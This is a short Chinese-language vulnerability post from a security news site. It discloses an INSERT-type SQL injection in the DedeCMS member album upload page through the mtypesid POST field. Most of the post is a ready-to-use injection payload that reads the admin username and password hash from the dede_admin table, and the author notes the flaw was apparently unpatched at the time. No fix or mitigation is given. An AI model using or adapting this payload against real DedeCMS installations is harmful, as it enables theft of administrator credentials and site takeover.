设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:首页 > 安全中心 > 最新漏洞 > 正文

dedecms某一处insert型注入

时间:2013-10-08 21:16 来源:未知 作者:www.secye.com 阅读:

dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的

漏洞需要会员,所以比较鸡肋啦
发表文章处,post表单的mtypesid可以注入
 
/dedecmsnew/member/album_add.php
 
 
 
注入的代码:
 
mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',
 
'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%